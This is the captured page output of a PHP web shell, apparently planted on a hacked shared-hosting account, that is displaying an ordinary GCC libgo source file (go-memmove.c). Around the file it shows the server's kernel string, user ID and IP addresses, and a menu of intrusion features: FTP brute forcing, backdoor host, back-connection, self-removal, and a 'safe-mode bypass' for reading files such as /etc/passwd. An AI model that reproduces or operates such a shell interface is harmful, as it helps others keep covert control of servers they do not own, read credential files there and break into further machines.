Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/libgo/runtime/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     go-memmove.c (1.85 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* go-memmove.c -- memmove

   Copyright 2021 The Go Authors. All rights reserved.
   Use of this source code is governed by a BSD-style
   license that can be found in the LICENSE file.  */

#include "runtime.h"

void gomemmove(void *, void *, uintptr)
  __asm__ (GOSYM_PREFIX "runtime.memmove")
  __attribute__ ((no_split_stack));

// This implementation is necessary since
// the __builtin_memmove might use __libc_memmove
// which doesn't require atomicity of 8 byte
// moves.

void
gomemmove (void *dst, void *src, uintptr len)
{
#if !defined(__PPC64__)
  __builtin_memmove(dst, src, len);
#else
  uint64 offset, tail;
  int64 rem;
  uint64 dwords;
  uint64 i;
  char *bdst,*bsrc;

  rem = len;

  if (len == 0) {
    return;
  }

  // If src and dst don't have the same 8 byte alignment then
  // there is no issue with copying pointer atomicity. Use the
  // builtin.
  if (((uint64)dst % 8) != ((uint64)src % 8) || len < 8) {
    __builtin_memmove(dst, src, len);
    return;
  }

  // Length >= 8 && same ptr alignment
  offset = (uint64)dst % 8;

  // If not 8 byte alignment, move the intial bytes.
  if (offset > 0) {
    __builtin_memmove(dst, src, 8-offset);
    dst += (8-offset);
    src += (8-offset);
    rem -= (8-offset);
  }

  // Move the tail bytes to make the backward move
  // easier.
  tail = rem % 8;
  if (tail > 0) {
    __builtin_memmove(dst+rem-tail, src+rem-tail, tail);
    rem -= tail;
  }

  if (rem == 0) {
    return;
  }

  // Must now be 8 byte alignment and rem is multiple of 8.
  dwords = len>>3;

  // Determine if a backwards move is needed
  // Forward or backward, move all doublewords

  if ((uint64)(dst - src) < (uint64)rem) {
    bdst = dst+rem-8;
    bsrc = src+rem-8;
    for (i = 0; i<dwords; i++) {
        *(uint64*)bdst = *(uint64*)bsrc;
        bdst -= 8;
        bsrc -= 8;
    }
  } else {
    for (i = 0; i<dwords; i++) {
        *(uint64*)dst = *(uint64*)src;
        dst += 8;
        src += 8;
    }
  }
#endif
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0053 ]--